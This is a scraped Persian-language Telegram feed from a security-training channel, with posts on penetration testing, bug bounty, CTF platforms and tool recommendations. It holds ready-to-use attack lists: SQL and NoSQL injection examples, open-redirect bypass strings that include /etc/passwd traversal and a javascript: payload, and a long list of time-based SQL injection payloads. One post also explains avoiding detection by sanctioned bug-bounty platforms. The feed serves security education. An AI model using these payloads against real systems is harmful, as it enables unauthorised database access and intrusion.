Security hint – Telegram
Security hint
4.67K subscribers
75 photos
2 videos
18 files
190 links
🔥Security training

🎯 قراره روشن کننده مسیرتون باشیم.

یوتیوب: www.youtube.com/@sec_hint

اپارات: aparat.com/sec_hint

گیت‌هاب: https://github.com/sechint

ادمین:
@adm_sec_hint
Download Telegram
🔍 SQL vs NoSQL: 🔍
یکی از چالش‌های مهم در تست نفوذ، شناخت دقیق نوع دیتابیس و استفاده از نقاط ضعف اون برای رسیدن به هدفه. دو نوع دیتابیس که بیشتر باهاشون سر و کار داریم، SQL و NoSQL هستن. امروز یه مقایسه سریع می‌کنیم و یه سری کوئری پرکاربرد رو هم معرفی می‌کنیم که توی حملات خیلی به درد می‌خوره.

🎯یک SQL: ساختارمند و قابل پیش‌بینی
وSQL مخفف "Structured Query Language" هست و برای دیتابیس‌های رابطه‌ای (Relational Databases) مثل MySQL، PostgreSQL، و SQL Server استفاده می‌شه. این نوع دیتابیس‌ها با جداول و روابط بین اون‌ها کار می‌کنن.

مثال کوئری‌های پرکاربرد در SQL:
- استخراج داده:

    SELECT * FROM users WHERE username = 'admin';

- تزریق (SQL Injection):

    SELECT * FROM users WHERE username = 'admin' --' AND password = 'password';

اینجاست که SQLi به درد می‌خوره؛ وقتی می‌خوای از نقاط ضعف توی اعتبارسنجی ورودی‌ها استفاده کنی.

🎯دو NoSQL: انعطاف‌پذیر و مقیاس‌پذیر
وNoSQL یعنی "Not Only SQL" و برای دیتابیس‌هایی استفاده می‌شه که ساختار غیررابطه‌ای دارن، مثل MongoDB، Cassandra، و CouchDB. این دیتابیس‌ها معمولاً داده‌ها رو به شکل سند (Document) یا جفت کلید-مقدار (Key-Value) ذخیره می‌کنن.

مثال کوئری‌های پرکاربرد در NoSQL:
- استخراج داده در MongoDB:

    db.users.find({ "username": "admin" });

- تزریق (NoSQL Injection):

    db.users.find({ "username": { $ne: null }, "password": { $ne: null } });

اینجا هم NoSQLi وقتی وارد می‌شه که داده‌ها به‌درستی اعتبارسنجی نمی‌شن و می‌تونیم با کوئری‌های مخرب، دیتابیس رو فریب بدیم.

⚔️ مقایسه کلی:
- ساختار داده: SQL داده‌ها رو به صورت جداول ساختاریافته ذخیره می‌کنه، در حالی که NoSQL از ساختارهای منعطف‌تری مثل JSON و Key-Value استفاده می‌کنه.
- مقیاس‌پذیری: SQL معمولاً به صورت عمودی (افزایش قدرت سرور) مقیاس‌پذیره، ولی NoSQL به صورت افقی (اضافه کردن سرورهای بیشتر) مقیاس‌پذیره.
- انعطاف‌پذیری: NoSQL توی کار با داده‌های بزرگ و غیرساختاریافته بهتر عمل می‌کنه.

💡 نکته مهم برای تست نفوذ:
شناخت تفاوت‌ها بین SQL و NoSQL، بهت کمک می‌کنه حملات تزریقی (SQLi و NoSQLi) رو دقیق‌تر و مؤثرتر پیاده‌سازی کنی. حواست باشه که همیشه قبل از هر حمله، نوع دیتابیس رو شناسایی کنی و از کوئری مناسب استفاده کنی.

مراقب باش! هکرهای موفق همیشه یک قدم جلوترن. 👀💻

#SQL #NoSQL #تست_نفوذ #امنیت_اطلاعات #Injection

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
🔥14👍5
⚡️اگر مطالبمون براتون مفید هست میشه بوستمون کنید؟

6 تا دیگه میخوایم😍
https://news.1rj.ru/str/boost/sec_hint
👍138
2 تای دیگه 😍🥰🥳
🔥11
🚨 جلوگیری از بلاک شدن در پلتفرم‌های باگ بانتی با استفاده از DNS Leak Test

همونطور که می‌دونید، پلتفرم‌های باگ‌بانتی مثل HackerOne و Bugcrowd ایران رو تحریم کردند و اگه بفهمند شما ایرانی هستید، ممکنه حسابتون رو بلاک کنند و دسترسی به تمام بانتی‌ها از بین بره. یکی از راه‌های شناسایی مکان کاربر از طریق DNS هست.

🔍 راه حل: تست نشت DNS

حتی اگر از VPN استفاده کنید، ممکنه درخواست‌های DNS شما به طور مستقیم از سمت سرور VPN عبور نکنه و به سرورهای دیگه نشت کنه. این نشت می‌تونه موقعیت واقعی شما رو فاش کنه و باعث بلاک شدن حساب‌تون بشه.

🔑 چطوری بفهمیم VPN ما نشت DNS داره؟

۱. به VPN متصل بشید.
۲. به سایت dnsleaktest.com برید.
۳. روی "Extended Test" کلیک کنید.
۴. نتایج رو بررسی کنید؛ اگر سرورهای DNS با کشور VPN شما هماهنگ نبودن، یعنی نشت DNS دارید!

🛡 راهکار: اگر نشت DNS داشتید، تنظیمات VPN رو بررسی کنید یا VPN معتبرتری رو استفاده کنید تا موقعیت شما امن باقی بمونه.

با این روش، می‌تونید از شناسایی شدن و بلاک شدن حساب‌تون در پلتفرم‌های باگ‌بانتی جلوگیری کنید. 🚫🔒

#باگ_بانتی #امنیت_وب #DNSLeak #حریم_خصوصی #VPN #باگ_هانتینگ #هک #امنیت

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
🔥12👍5👎2😁1👻1
⁉️تا حالا شده توی هکروان برای خوندن یک گزارش درمورد اسیب پذیری خاص کلی بگردید؟

توی این ریپو گزارشات (reports) هکروان رو براساس نوع اسیب پذیری دسته بندی کرده و اینطوری ساده تر دسترسی دارید.

nored0x.github.io/penetration%20testing/writeups-Bug-Bounty-hackrone/

#hackerOne #reports #writeup
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
🔥157👍1
🔥 ریپازیتوری Vulhub: یک ابزار قدرتمند برای شناخت کد های اسیب پذیر 🔥

💡 اگر به دنبال یک پلتفرم برای شبیه‌سازی آسیب‌پذیری‌های واقعی هستید، Vulhub یک انتخاب فوق‌العاده است. با استفاده از Docker-Compose، شما می‌تونید بدون نیاز به دانش عمیق از Docker، محیط‌هایی با آسیب‌پذیری‌های متنوع مثل RCE و SQL Injection راه‌اندازی کنید.

⚙️ مزایا:
- شبیه‌سازی حملات در محیط امن
- یادگیری نحوه اکسپلویت آسیب‌پذیری‌ها
- ابزار ارزشمند برای آموزش و تست عملی

🔗 مشاهده ریپازیتوری Vulhub

⚔️ سطح خودت رو ارتقا بده!

#Pentesting #BugBounty #Vulhub #CyberSecurity #Docker

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
👍135
🎙 Critical Thinking - Bug Bounty Podcast 🎙

اگه به فکر ورود به دنیای باگ‌بانتی تمام‌وقت هستی، این پادکست دقیقاً برای تو ساخته شده! توی هر قسمت، نکات کلیدی و تجربه‌های واقعی درباره چالش‌ها و فرصت‌های این مسیر رو یاد می‌گیری. از نحوه تغییر شغل سنتی به باگ بانتی تا راهکارهای موفقیت،چالش‌ها، شرایط لازم، و یه نقشه راه کامل برای گذر از این مسیر توضیح داده شده!

🔗 برای گوش دادن: Critical Thinking Podcast

#BugBounty #امنیت_سایبری #پادکست

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
11👍1
💡 ترفندهای موثر برای بای‌پس Open Redirect
اگه با Open Redirect سر و کار داری، این ترفندها می‌تونن بهت کمک کنن تا بای‌پس‌های موثری ایجاد کنی:

1. تزریق Null-byte

- /google.com%00/
- //google.com%00


2. رمزگذاری Base64

- aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
- //base64:d3d3Lmdvb2dsZS5jb20=/


3. تغییر حساس به حروف بزرگ و کوچک

- //GOOGLE.com/
- //GoOgLe.com/


4. رشته‌های UTF-8 بیش از حد طولانی

- %C0%AE%C0%AE%2F
- %C0%AF%C0%AF%2F%2Fgoogle.com


5. روش‌های ترکیبی رمزگذاری

- /%68%74%74%70://google.com
- //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D


6. روش‌های مختلف نوشتن دامنه

- //google.com@127.0.0.1/
- //127.0.0.1.xip.io/


7. کاراکترهای خاص در انتها
- //google.com/#/
- //google.com/;&/


8. فرمت هشت‌گانه آدرس IP

- http://0177.0.0.1/
- http://00177.0000.0000.0001/


9. انواع آدرس‌های IP
- http://3232235777
- http://0xC0A80001


10. مسیر‌یابی با رمزگذاری
- /..%252f..%252f..%252fetc/passwd
- /%252e%252e/%252e%252e/%252e%252e/etc/passwd


11. استفاده از پروتکل‌های جایگزین

- ftp://google.com/
- javanoscript:alert(1)//google.com


12. آدرس‌های پروتکل نسبی

- :////google.com/
- :///google.com/


13. موارد لبه در ریدایرکت‌ها

- //google.com/?q=//bing.com/
- //google.com?q=https://another-site.com/


14. نوشتار IPv6

- http://[::1]/
- http://[::ffff:192.168.1.1]/


15. دو بار رمزگذاری آدرس URL

- %252f%252fgoogle.com
- %255cgoogle.com


16. ترکیب مسیردهی و رمزگذاری

- /%2E%2E/%2E%2E/etc/passwd
- /%2e%2e%5c%2e%2e/etc/passwd


17. ردیابی DNS معکوس

- https://google.com.reverselookup.com
- //lookup-reversed.google.com/


18. پورت‌های غیرمعمول

- http://google.com:81/
- https://google.com:444/


19. مبهم‌سازی مسیر با Unicode
- /%E2%80%8Egoogle.com/
- /%C2%A0google.com/


20. مبهم‌سازی پارامترهای Query

- //google.com/?q=http://another-site.com/
- //google.com/?redirect=https://google.com/


21. استفاده از نماد @ برای userinfo

- https://admin:password@google.com/
- http://@google.com


22. ترکیب userinfo و مسیردهی

https://admin:password@google.com/../../etc/passwd



#OpenRedirect #BugBounty #PenTesting #CyberSecurity

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
16👍5
🧐تا حالا خواستین IP تون لو نره؟
چیکار کردین براش⁉️
دوست داشتید توی کپشن بنویسید‼️

در این مورد هم یک ویدیو توی یوتیوب گذاشتم😏
#YouTube #Fake_IP

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
👍104
🚀جدیدترين و سریعترين DNS Resolver 🚀

یه ابزار فوق‌العاده به نام SanicDNS توسط Hadrian معرفی شده که می‌تونه ۵ میلیون درخواست DNS در ثانیه رو پردازش کنه! 😲
سرعت این DNS Resolver خیلی بیشتر از ابزارهای قدیمی مثل MassDNS هست و به‌خاطر عملکرد فوق‌العاده سریعش در پردازش و پاسخ به درخواست‌ها، می‌تونه برای تست‌های امنیتی و عملکرد شبکه مفید باشه. ⚡️

🔗 جزئیات بیشتر و دریافت:
SanicDNS در GitHub

#DNS #SanicDNS #CyberSecurity #Pentesting #BugBounty
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
👍14🤩3
🎞اگر تا حالا با SQLmap کار نکردید یا نمیدونید از UNION attack چطوری میشه استفاده کرد پیشنهاد میکنم ویدیو این هفته چنل یویتوب رو حتما ببینید😍

https://youtu.be/J9iYUNX3TV4?si=hcI-N772KvH3MlSe

#Youtube #sqlmap #sql_injection

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
🔥13👍4
سلام به همراهان عزیزم😍
برای ادامه مسیر خوشحال میشم باهم تعامل داشته باشیم چه در کپشن اینجا چه در کامنت های یوتیوب، برام بنویسید و بگید:
چقدر براتون این ویدیو ها مفید بوده🤩
از چه چیزی خوشتون اومده و دوست داشتید و از چه چیزی خوشتون نیومده 🤔

و مثل همیشه مرسی که هستید❤️
23👍2
🚨 Time-Based SQL Injection Payloads 🚨

این لیست شامل Payload‌های مختلف برای اجرای حملات SQL Injection با استفاده از تأخیر زمانی است. این روش به شما کمک می‌کند تا آسیب‌پذیری‌های زمان‌محور را در دیتابیس‌های مختلف مثل MySQL، PostgreSQL و MSSQL شناسایی کنید.

🔹 چند نمونه از Payloadها:

timebased payloads for different dbms:
XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='
...

⚠️ توجه: تمامی payloadها را برای تست امنیتی هدفمند استفاده کنید و از آن‌ها در محیط‌های قانونی بهره ببرید.

#SQLi #Injection #TimeBased #Security

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
12👍5👎1🤩1
🎯معرفی پلتفرم های CTF بر اساس سطح سختی 🎯

🟢 مبتدی:
🔗 picoCTF
🔗 TryHackMe
🔗 CTFlearn
🔗 Hacker101 CTF
🔗 LegitBS
🔗 OverTheWire
🔗 Crackmes.one
🔗 CyberTalents
🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳

🟡 سطح متوسط:
🔗 TryHackMe
🔗 Flare-On
🔗 CTFtime
🔗 Pwn College
🔗 OWASP WebGoat
🔗 PentesterLab
🔗 CMD Challenge
🔗 Hacksplaining
🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳

🔴 پیشرفته:
🔗 Hack The Box
🔗 root-me 🌟🌟
🔗 VulnHub 🌟🌟
🔗 Exploit Exercises
🔗 PortSwigger Web Security 🌟🌟
🔗 Challenges.re
🔗 CryptoHack
🔗 CryptoPals
🔗 Rubiya CTF
🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳

🟣 حرفه‌ای:
🔗 UnderTheWire
🔗 AttackDefense
🔗 FBCTF GitHub Archive
🔗 Awesome CTF GitHub
🔗 Awesome CTF Resources GitHub
🔗 Guy in a Tuxedo GitHub
🔗 Pwn.tn
🔗 SmashTheStack
🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳

با هر سطحی که باشی، یکی از این پلتفرم‌ها حتماً به کارت میاد! 🚀

#CTF #امنیت_سایبری #آموزش

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
👍166🔥2👏1
🚨 CSP Bypass - Content Security Policy (CSP) 🚨

🌐 سایت CSP Bypass مرجع عالی برای محققان امنیت، توسعه‌دهندگان و کارشناسان تست نفوذ است تا با روش‌های دور زدن CSP آشنا شوند. CSP یکی از راه‌های مهم برای جلوگیری از حملات XSS است، اما اگر به درستی پیکربندی نشود، قابل دور زدن است.

🔧 با یادگیری تکنیک‌های مختلف و بررسی سناریوهای عملی، می‌توانید ضعف‌های پیکربندی CSP را شناسایی کنید


#CSP #امنیت #XSS #Bypass
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
6👍3
🎞اولین قدم در یادگیری لینوکس ستاپ کردن محیط اش هست.😎

و اولین قدم در حوزه امنیت یادگیری لینوکس هست⁉️

🤯میدونستید بدون ماشین مجازی میتونید داخل ویندوزتون لینوکس داشته باشید؟

الان یکی میاد میگه چرا انقدر گفتی قشنگ توی ویدیو


https://youtu.be/alxPYBMWzIc?si=D5lZ3IyC5bzq7ZDO

#YouTube #Linux
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
12👍2🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
🔥 اکستنشن کروم برای استخراج اندپوینت‌ها و URLها از فایل‌های جاوااسکریپت 🔍

🔗 و Extractifyیه اکستنشن جذاب برای کرومه که به طور خودکار اندپوینت‌ها و URLها رو از فایل‌های جاوااسکریپت پیدا می‌کنه. 📂 ویژگی خاص این ابزار اینه که دائم روی DOM سایت نظارت داره؛ یعنی اگر یه فایل جاوااسکریپت جدید به DOM اضافه بشه، بلافاصله اون رو اسکن و اطلاعات مورد نیاز رو استخراج می‌کنه.

🔧 مناسب برای تست نفوذ روی سایت‌های مدرن مثل SPAها (مثل Next.js، React و ...)

#BugBounty #ChromeExtension #JavaScript #SPA

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube
14👍5👎1
Security hint
🎞اولین قدم در یادگیری لینوکس ستاپ کردن محیط اش هست.😎 و اولین قدم در حوزه امنیت یادگیری لینوکس هست⁉️ 🤯میدونستید بدون ماشین مجازی میتونید داخل ویندوزتون لینوکس داشته باشید؟ الان یکی میاد میگه چرا انقدر گفتی قشنگ توی ویدیو https://youtu.be/alxPYBMWzIc?si…
🎞 ویدیو امروزمون در مورد کامند های ابتدایی و کار با فایل ها در لینوکس هست. یکی از موارد مهم که باید بدونید تا خروجی ابزار های مختلف باگ بانتی و پنتست رو بتونید مدیریت کنید😉

فقط یکم طولانی شده چون خواستم تک تک دستورات رو بررسی کنم و این سه تا موضوعی ک امروز گفتم به هم نزدیک تر بودن 😇

حمایت میکنید بزارم یوتیوب؟!😍

YouTube
13👍3👎1💯1